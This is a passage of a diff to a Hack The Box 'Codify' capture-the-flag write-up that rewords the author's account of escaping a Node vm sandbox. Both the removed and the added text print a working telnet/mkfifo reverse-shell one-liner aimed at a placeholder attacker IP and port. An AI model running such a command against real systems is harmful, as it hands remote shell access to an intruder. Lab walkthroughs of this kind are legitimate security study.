Raian-Moretti/hacking-write-ups/[HTB]Codify/README.md

 console.log(vm.run(code));
 ```

-Then I changed the `execSync` parameter to get a reverse shell so I opened a netcat session and tried some types found at [revshell](https://www.revshells.com/).
-After a few tries getting error I got the shell with this one `TF=$(mktemp -u);mkfifo $TF && telnet <my_ip> <my_port> 0<$TF | bash 1>$TF`.

-!
-Tried some commands to see a few things, everything working fine.
-So, I upgraded my terminal — I already show some methods in previous write-ups.

 Next, I modified the `execSync` parameter to obtain a reverse shell.
 I opened a netcat session and attempted various types found at [revshell](https://www.revshells.com/).
 After a few attempts resulting in errors, I successfully obtained a shell with the following command: `TF=$(mktemp -u);mkfifo $TF && telnet <my_ip> <my_port> 0<$TF | bash 1>$TF`.

 Gotcha, I’m in!
 I tested a few commands to verify everything was working fine.
 Subsequently, I upgraded my terminal—I've already shared some methods in previous write-ups.